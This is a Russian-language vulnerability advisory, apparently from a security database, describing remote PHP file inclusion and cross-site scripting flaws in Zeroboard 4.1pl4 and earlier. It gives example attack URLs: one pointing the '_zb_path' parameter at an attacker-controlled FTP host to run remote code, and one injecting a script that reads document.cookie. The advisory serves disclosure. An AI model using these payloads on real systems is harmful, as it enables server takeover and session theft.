Дата публикации: | 27.12.2004 |
Дата изменения: | 17.10.2006 |
Всего просмотров: | 6020 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Zeroboard 4.1pl4 и более ранние версии
Описание: Уязвимость существует из-за некорректной обработки входных данных в переменной '_zb_path' файла 'outlogin.php' и переменной 'dir' файла 'write.php' при включенных register_globals в конфигурационном файле php.ini. Удаленный атакующий может присвоить переменной специальное значение и выполнить произвольный php сценарий с привилегиями текущего web сервера. Пример:
http://[target]/outlogin.php?_zb_path=ftp://[ attacker]/pub/ Межсайтовое выполнение сценариев возможно из-за некорректной обработки данных в параметре 'user_id' файла 'check_user_id.php'. Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере целевого пользователя. Пример: http://[target]/check_user_id.php?user_id=<script>alert(document.cookie)</script> URL производителя: www.zeroboard.com Решение: Решение не существует на данный момент. |
|
Ссылки: | PHP source injection and cross-site scripting vulnerabilities in ZeroBoard |